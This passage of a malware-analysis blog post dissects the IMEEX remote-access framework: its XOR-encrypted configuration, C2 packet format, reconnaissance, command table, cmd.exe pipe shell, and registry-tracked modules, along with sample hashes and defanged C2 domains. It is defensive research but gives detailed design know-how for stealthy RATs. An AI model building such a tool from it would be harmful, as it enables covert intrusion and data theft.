operating system version, volume serial number, and system language, and relays
this data to its command-and-control (C2) server.&lt;/p&gt;
&lt;p&gt;Our analysis indicates that the IMEEX framework has primarily targeted
&lt;a href="#imeex-targeting-djibouti"&gt;Djibouti&lt;/a&gt;, with a less capable variant appearing
targeting &lt;a href="#imeex-targeting-afghanistan"&gt;Afghanistan&lt;/a&gt;. At this time, we are
unaware of the wider distribution of the campaign but assume it&amp;rsquo;s not limited
to these two countries. While the infection vector remains unclear, the
behavior of the malware suggests it is part of a carefully orchestrated attack
campaign aimed at maintaining persistence and avoiding detection through
advanced techniques such as masquerading as legitimate processes, mutex
creation, and encrypted communications with the C2 server.&lt;/p&gt;
&lt;p&gt;Interestingly, there are signs of infrastructure reuse with ShadowPad, a
modular malware platform privately sold and employed by multiple Chinese threat
actor groups. This overlap might indicate a strategic rotation from ShadowPad
to the IMEEX framework, although it does not conclusively link the campaign to
any specific group. Instead, it suggests a possible evolution in tactics, where
the attackers leverage IMEEX as an alternative toolset.&lt;/p&gt;
&lt;p&gt;This blog aims to provide a detailed technical analysis of the IMEEX
framework&amp;rsquo;s capabilities. We will explore its core functionalities, ranging
from system reconnaissance and data collection to dynamic module loading and
execution of additional modules.&lt;/p&gt;
&lt;h2&gt;Key Findings about IMEEX&lt;span class="hx:absolute hx:-mt-20" id="key-findings-about-imeex"&gt;&lt;/span&gt;
&lt;a href="#key-findings-about-imeex" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Geographic Distribution: The IMEEX framework samples were submitted to
VirusTotal from Djibouti and Afghanistan, indicating potential targeting or
deployment in those regions. This geographic pattern suggests a focused
campaign, with some variations between samples in terms of functionality.&lt;/li&gt;
&lt;li&gt;Masquerading as Legitimate Processes: IMEEX framework expects to be loaded by
svchost.exe or rundll32.exe, ensuring it blends with legitimate Windows
processes to avoid detection.&lt;/li&gt;
&lt;li&gt;Configuration Decryption: IMEEX framework extracts its configuration from the
last 108 bytes of its executable. The decrypted data includes C2 domains and
a port number, usually 443.&lt;/li&gt;
&lt;li&gt;Command and Control (C2) Communication: The malware communicates with its C2
server via custom structured packets, including checksums and identifiers for
data integrity. It uses port 443, blending in with legitimate HTTPS traffic,
over TLS.&lt;/li&gt;
&lt;li&gt;Advanced File, Process, and Registry Operations: IMEEX framework supports a
wide range of operations, including file manipulation, process control,
remote code execution, and extensive Windows Registry modifications.&lt;/li&gt;
&lt;li&gt;Modular Execution: The framework employs a modular approach, loading and
executing components on-demand. The malware uses the Windows Registry to keep
track of its modules, ensuring each is executed only once and monitoring
their state throughout execution.&lt;/li&gt;
&lt;li&gt;Persistence and Evasion: By modifying registry keys and leveraging scheduled
deletions for locked files, the malware maintains persistence while evading
detection.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Technical Overview&lt;span class="hx:absolute hx:-mt-20" id="technical-overview"&gt;&lt;/span&gt;
&lt;a href="#technical-overview" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The malware checks the context in which its DLL is loaded by verifying if it is
running under legitimate system processes like svchost.exe or rundll32.exe.
Based on the process name, it either proceeds to establish network connections,
or terminates to avoid detection. This behavior suggests an attempt to and
blend in with trusted Windows processes, enhancing stealth and persistence.&lt;/p&gt;
&lt;p&gt;The malware creates a mutex named either Global4B59AFCC or Global3796878E. This
mutex ensures that only one instance of the malware runs on the infected system
at any given time, preventing conflicts and redundant resource usage.&lt;/p&gt;
&lt;h3&gt;Sample Analysis&lt;span class="hx:absolute hx:-mt-20" id="sample-analysis"&gt;&lt;/span&gt;
&lt;a href="#sample-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;We analyzed four samples, and most of their functions remained consistent
across versions. The samples analyzed include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;3e25798da0232d9039e570fb34d4bdccf7f082fa38b486a097d954f5f3debab3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7a3113d3212605a33924ad16ab360b7d48cc94de0de1c1cf9dc44695d4a01648&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7d02ad54e4e56f34e59414f9b02397901fc61bb1158a31ab2586fe62564aeb93&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;94b8a01ad4b53d202984afb6781d7f88cb5cd329349791516e985ea88e08ad66&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Four files were submitted to VirusTotal from Djibouti. During the
investigation, we found a similar framework variant from Afghanistan with fewer
capabilities, which we will also cover.&lt;/p&gt;
&lt;p&gt;The files from Djibouti are nearly identical, with only minor differences in
mutex names and C2 domains. The consistent codebase and minimal changes suggest
they are variants deployed within the same campaign. The primary differences
lie in the names of the mutexes and the process names the framework uses for
masquerading.&lt;/p&gt;
&lt;h3&gt;Configuration Extraction and Decryption&lt;span class="hx:absolute hx:-mt-20" id="configuration-extraction-and-decryption"&gt;&lt;/span&gt;
&lt;a href="#configuration-extraction-and-decryption" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The framework extracts its configuration data from the last 108 bytes of its
own executable file. This data is encrypted using a custom XOR-based algorithm.
The decryption process involves:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Read the encrypted data from the executable&amp;rsquo;s end.&lt;/li&gt;
&lt;li&gt;Perform a reverse iteration through the data, XOR-ing each value with the
value that precedes it&lt;/li&gt;
&lt;li&gt;Validate the decrypted data with the magic value &lt;code&gt;0xFEFCFDFB&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The first 2 bytes following the magic are the value of the port – 443.&lt;/li&gt;
&lt;li&gt;The rest of the bytes are XOR-ed with the value &lt;code&gt;0xE6&lt;/code&gt; giving the decrypted
domains,separated by a semicolon.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Appendix B includes Python configuration extractors for all variants observed.&lt;/p&gt;
&lt;p&gt;We extracted the following C2 domains and addresses from the samples we
analyzed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;yurtumawat.wwwhost[.]us&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;erkinhorshiden.onedumb[.]com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;45.141.139[.]146&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Network Initialization and Operation&lt;span class="hx:absolute hx:-mt-20" id="network-initialization-and-operation"&gt;&lt;/span&gt;
&lt;a href="#network-initialization-and-operation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;IMEEX initializes network communication by establishing a socket connection to
decrypted C2 server addresses. It attempts to connect over TCP port 443, likely
evading network monitoring by blending with legitimate encrypted web traffic.
Notably, the framework uses dynamic DNS providers for its command-and-control
servers.&lt;/p&gt;
&lt;p&gt;The framework employs checksums and specific identifiers in its communication
protocol to ensure data integrity and accurate command execution. The use of
structured headers and data packets allows for a modular approach to command
handling and response generation.&lt;/p&gt;
&lt;p&gt;Key Features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Checksums: Calculated to verify that data has not been tampered with during
transmission. Each packet includes a checksum calculated over the header.&lt;/li&gt;
&lt;li&gt;IDs and Sub-IDs: Numeric identifiers specify the exact command or response
type, ensuring proper interpretation of exchanged information between the
malware and the C2 server. The response packets also use a unique ID to
identify the operation that is sending the response.&lt;/li&gt;
&lt;li&gt;Error Handling: The malware sends error responses when operations fail,
allowing the C2 server to handle exceptions or retry commands.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;C2 Packet Data Structure&lt;span class="hx:absolute hx:-mt-20" id="c2-packet-data-structure"&gt;&lt;/span&gt;
&lt;a href="#c2-packet-data-structure" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Communication between the malware and the C2 server uses specific packet
formats for both requests and responses. Each packet contains a header and a
data section, adhering to predefined structures to facilitate various
operations.&lt;/p&gt;
&lt;p&gt;Structure of packets received from the C2:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Packet&lt;/th&gt;
&lt;th&gt;Offset&lt;/th&gt;
&lt;th&gt;(Bytes)&lt;/th&gt;
&lt;th&gt;Size (Bytes)&lt;/th&gt;
&lt;th&gt;Field Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Header&lt;/td&gt;
&lt;td&gt;0-3&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Unspecified Operation-specific data.&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;4-7&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Class ID&lt;/td&gt;
&lt;td&gt;Specifies the main operation to perform.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;8-11&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Command ID&lt;/td&gt;
&lt;td&gt;Additional identifier for sub-commands.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;12-15&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Checksum&lt;/td&gt;
&lt;td&gt;Validates the integrity of the header data.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data&lt;/td&gt;
&lt;td&gt;16+&lt;/td&gt;
&lt;td&gt;Parameters&lt;/td&gt;
&lt;td&gt;Contains parameters or data required for executing the command.&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Structure of packets that are sent to the C2:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Packet&lt;/th&gt;
&lt;th&gt;Offset (Bytes)&lt;/th&gt;
&lt;th&gt;Size (Bytes)&lt;/th&gt;
&lt;th&gt;Field Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Header&lt;/td&gt;
&lt;td&gt;0-3&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Packet size&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;4-7&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;ID&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;8-11&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Checksum&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data&lt;/td&gt;
&lt;td&gt;12+&lt;/td&gt;
&lt;td&gt;Command parameters&lt;/td&gt;
&lt;td&gt;Contains the actual data or payload.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The ID field encodes a combination of the Class ID, Command ID, and an optional
flag in big-endian format, serving as a unique identifier to correlate specific
responses from the framework with the operations that generated them.&lt;/p&gt;
&lt;h3&gt;Reconnaissance&lt;span class="hx:absolute hx:-mt-20" id="reconnaissance"&gt;&lt;/span&gt;
&lt;a href="#reconnaissance" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Before initiating its main thread, which manages communication with the C2
server and executes various operations, the framework performs initial
reconnaissance on the infected endpoint. It collects system information and
sends this data to the C2 server. The information gathered includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;System ANSI Code Page Identifier&lt;/strong&gt;: Obtained using the
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-getacp"target="_blank" rel="noopener"&gt;GetACP&lt;/a&gt;
function.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;File System and Volume Information&lt;/strong&gt;: Retrieves details about the file
system and volume of the current working directory.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hostname&lt;/strong&gt;: The network name assigned to the host machine.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operating System Version&lt;/strong&gt;: The version number and build information of the
host&amp;rsquo;s operating system.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;IP Address&lt;/strong&gt;: The current IP address assigned to the host.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This collected information is sent to the C2 server with an identifier value of
&lt;code&gt;0x88&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Supported Commands by the Framework&lt;span class="hx:absolute hx:-mt-20" id="supported-commands-by-the-framework"&gt;&lt;/span&gt;
&lt;a href="#supported-commands-by-the-framework" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The IMEEX framework supports a wide array of commands, enabling comprehensive
control over infected systems. These commands are categorized into several
classes, such as file management, process manipulation, remote command
execution, and registry operations. The RAT&amp;rsquo;s functionality includes reading,
writing, deleting files and directories, enumerating and terminating processes,
and remotely executing programs and commands on the compromised machine. It
uses a structured communication protocol with custom packet headers to manage
command exchanges with its C2 server.&lt;/p&gt;
&lt;p&gt;In addition to basic system control, the framework supports Windows Registry
operations, allowing it to write, update, and delete registry values—critical
for maintaining persistence and managing module execution. These capabilities
make it highly versatile for remote administration and execution of malicious
tasks.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Command Class&lt;/th&gt;
&lt;th&gt;Class ID&lt;/th&gt;
&lt;th&gt;Command ID&lt;/th&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;Extra Parameters&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;File Operation&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Get Drive Info&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;File/Directory Discovery&lt;/td&gt;
&lt;td&gt;File path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Write File&lt;/td&gt;
&lt;td&gt;File path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Read File&lt;/td&gt;
&lt;td&gt;File path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;No Operation/Reserved&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Delete folder and content&lt;/td&gt;
&lt;td&gt;File path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Process Operation&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Get Processes Info&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Terminate Process&lt;/td&gt;
&lt;td&gt;PID&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote Process Execution&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;td&gt;Create a Process and run a command&lt;/td&gt;
&lt;td&gt;Command to execute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command Execution Using Windows Pipe&lt;/td&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Set a pipe connected to cmd&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Terminate Pipe&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Write to pipe&lt;/td&gt;
&lt;td&gt;Content&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Modules Operation&lt;/td&gt;
&lt;td&gt;20&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Write File&lt;/td&gt;
&lt;td&gt;Registry key and then content&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Delete file from Registry entry path&lt;/td&gt;
&lt;td&gt;Registry sub-key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Create Registry Values&lt;/td&gt;
&lt;td&gt;key/val&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;?&lt;/td&gt;
&lt;td&gt;?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Get Data from the Registry&lt;/td&gt;
&lt;td&gt;?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;td&gt;Checksum&lt;/td&gt;
&lt;td&gt;?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Driver Operation&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Check if new drivers were added&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4&gt;File Operations&lt;span class="hx:absolute hx:-mt-20" id="file-operations"&gt;&lt;/span&gt;
&lt;a href="#file-operations" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;h5&gt;Get Driver Information&lt;span class="hx:absolute hx:-mt-20" id="get-driver-information"&gt;&lt;/span&gt;
&lt;a href="#get-driver-information" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;The framework iterates over all available drivers (A-Z) and determines their
type using the
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-getdrivetypew"target="_blank" rel="noopener"&gt;GetDriveTypeW&lt;/a&gt;
API (e.g., fixed, removable, CD-ROM). For CD-ROM drivers, it retrieves the
display name. For fixed drivers, it calls
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-getvolumeinformationw"target="_blank" rel="noopener"&gt;GetVolumeInformationW&lt;/a&gt;,
which returns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Volume Name&lt;/strong&gt;: The label of the specified volume.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Volume Serial Number&lt;/strong&gt;: A unique number assigned by the OS during disk
formatting.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Maximum Component Length&lt;/strong&gt;: Maximum file name component length.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;File System Flags&lt;/strong&gt;: Features supported by the file system.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;File System Name&lt;/strong&gt;: The name of the file system (e.g., NTFS, FAT32).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All this information is sent to the C2 server in a header with the ID 0x31. As
mentioned above, the ID that is sent back consists of the class ID (3) and the
command ID (1).&lt;/p&gt;
&lt;h5&gt;Directory Discovery&lt;span class="hx:absolute hx:-mt-20" id="directory-discovery"&gt;&lt;/span&gt;
&lt;a href="#directory-discovery" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;The framework receives a path from the C2 and performs a directory scan to
enumerate the files and folders within it. It then gathers detailed information
for each file, including size, last modified timestamp, attributes, and
filename. This collected data is subsequently transmitted back to the C2 in
separate packets, with each packet bearing an ID of 0x324. The presence of a 4
in this ID signifies that the operation has not yet completed sending the data.
In its final stage, when the last packet with ID 0x32 is sent, it indicates the
successful completion of the data transmission.&lt;/p&gt;
&lt;h5&gt;Write File&lt;span class="hx:absolute hx:-mt-20" id="write-file"&gt;&lt;/span&gt;
&lt;a href="#write-file" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;The framework receives a file path where the file will be created, and after
the file is created, it sends an acknowledgment (ACK) packet to the C2. The
packet ID in this case is 0x33, and it returns the allocated file size.&lt;/p&gt;
&lt;p&gt;Next, the framework waits to receive the file content from the C2. Each
packet&amp;rsquo;s content is verified using a checksum, with the expected checksum value
stored in the 8th byte of the packet. For each chunk written, the framework
sends an ACK, indicating the status of the
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile"target="_blank" rel="noopener"&gt;WriteFile&lt;/a&gt;
API call.&lt;/p&gt;
&lt;h5&gt;Read File&lt;span class="hx:absolute hx:-mt-20" id="read-file"&gt;&lt;/span&gt;
&lt;a href="#read-file" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;The framework receives a path to a file to be read. It will open the file, read
its contents, and send it back to the C2 in chunks of 0x8000 bytes. The packet
IDs associated with this operation are 0x34.&lt;/p&gt;
&lt;h5&gt;Delete File/Folder&lt;span class="hx:absolute hx:-mt-20" id="delete-filefolder"&gt;&lt;/span&gt;
&lt;a href="#delete-filefolder" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;The framework receives a path to a folder, which it will recursively delete. It
first sets the folder&amp;rsquo;s file attributes to FILE_ATTRIBUTE_NORMAL, then iterates
over all files in the provided path, deleting each one. The operation sends
back an ACK with the success code and the ID 0x36.&lt;/p&gt;
&lt;h4&gt;Process Operations&lt;span class="hx:absolute hx:-mt-20" id="process-operations"&gt;&lt;/span&gt;
&lt;a href="#process-operations" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;h5&gt;Get Processes Info&lt;span class="hx:absolute hx:-mt-20" id="get-processes-info"&gt;&lt;/span&gt;
&lt;a href="#get-processes-info" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;This command enumerates all processes and collects information such as the
process ID (PID), parent process ID, executable name, and whether it is a
system process. The information is sent to the C2 in a packet with the ID
0x514. Once all the information is sent, a final ACK packet is sent with the ID
0x55.&lt;/p&gt;
&lt;h5&gt;Terminate Process&lt;span class="hx:absolute hx:-mt-20" id="terminate-process"&gt;&lt;/span&gt;
&lt;a href="#terminate-process" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;The command receives a PID to terminate. The framework elevates its privileges
by setting the SeDebugPrivilege, which allows it to debug other processes and
access their memory. It then terminates the specified process using the
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-terminateprocess"target="_blank" rel="noopener"&gt;TerminateProcess&lt;/a&gt;
API call. The operation sends back an ACK with the success code and the ID
0x52.&lt;/p&gt;
&lt;h5&gt;Remote Code Execution&lt;span class="hx:absolute hx:-mt-20" id="remote-code-execution"&gt;&lt;/span&gt;
&lt;a href="#remote-code-execution" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;This operation receives from the C2 a path to an executable on the victim
machine. It creates a new hidden process using the specified executable. An ACK
packet with the status code of this operation and the ID 11 is sent.&lt;/p&gt;
&lt;h4&gt;Command Execution&lt;span class="hx:absolute hx:-mt-20" id="command-execution"&gt;&lt;/span&gt;
&lt;a href="#command-execution" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;h5&gt;Set a pipe connected to the cmd&lt;span class="hx:absolute hx:-mt-20" id="set-a-pipe-connected-to-the-cmd"&gt;&lt;/span&gt;
&lt;a href="#set-a-pipe-connected-to-the-cmd" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;This operation creates a
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/ipc/pipes"target="_blank" rel="noopener"&gt;pipe&lt;/a&gt; connected to
cmd.exe with a hidden window. The input is redirected to cmd.exe, and the
output is sent to the C2. Essentially, this connects the socket to the pipe and
gives the attackers the ability to execute commands. The header for this packet
has an ID of 0x101: the 0x10 represents the class ID 16 and 1 is the command
ID.&lt;/p&gt;
&lt;h5&gt;Terminate pipe&lt;span class="hx:absolute hx:-mt-20" id="terminate-pipe"&gt;&lt;/span&gt;
&lt;a href="#terminate-pipe" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;When this command is received, the framework terminates the pipe process using
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-terminateprocess"target="_blank" rel="noopener"&gt;TerminateProcess&lt;/a&gt;
and sends an ACK.&lt;/p&gt;
&lt;h5&gt;Write to pipe&lt;span class="hx:absolute hx:-mt-20" id="write-to-pipe"&gt;&lt;/span&gt;
&lt;a href="#write-to-pipe" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;This command sends input to the pipe connected to cmd.exe. The input data is
first processed by retrieving the system&amp;rsquo;s OEM code page identifier using
GetOEMCP and converting it using
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/stringapiset/nf-stringapiset-widechartomultibyte"target="_blank" rel="noopener"&gt;WideCharToMultiByte&lt;/a&gt;.
The framework then writes the command line into the pipe, waits for 100
milliseconds, and captures the output. If any output is detected, it sends the
content to the C2 in packets with an ID of 0x104. Once all the output is
captured, a final packet with ID 0x1044 is sent.&lt;/p&gt;
&lt;h4&gt;Modules Operation&lt;span class="hx:absolute hx:-mt-20" id="modules-operation"&gt;&lt;/span&gt;
&lt;a href="#modules-operation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The framework has extended capabilities for remote code execution of modules,
and it uses information that is stored in the Windows Registry to track and
execute them.&lt;/p&gt;
&lt;h5&gt;Write a file and update the Windows Registry&lt;span class="hx:absolute hx:-mt-20" id="write-a-file-and-update-the-windows-registry"&gt;&lt;/span&gt;
&lt;a href="#write-a-file-and-update-the-windows-registry" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;This function receives data from the C2, verifies its integrity, writes it to a
temporary file, and adds the file path to the system registry. The framework
uses a Windows Registry path that is intended to store the location of the
temporary executable.&lt;/p&gt;
&lt;p&gt;If the registry path already contains data, the file creation process is
skipped, assuming the executable is already present. Otherwise, a new file is
created, the name is set by the
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-gettempfilenamew"target="_blank" rel="noopener"&gt;GetTempFileNameW&lt;/a&gt;
API function, and the extension is set to.dat. Next, the framework receives
from the C2 the content of the file and writes into the file.&lt;/p&gt;
&lt;p&gt;After successfully receiving and writing all the data, the function sets the
file&amp;rsquo;s attributes to System (&lt;code&gt;FILE_ATTRIBUTE_SYSTEM&lt;/code&gt;) and copies timestamps
from kernel32.dll to the file, helping it blend in with legitimate system
files. Then, the path to the file is saved in the following Windows Registry
path: &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\IMEEX\&amp;lt;num&amp;gt;N&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2024/10/technical-analysis-of-a-novel-imeex-framework/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
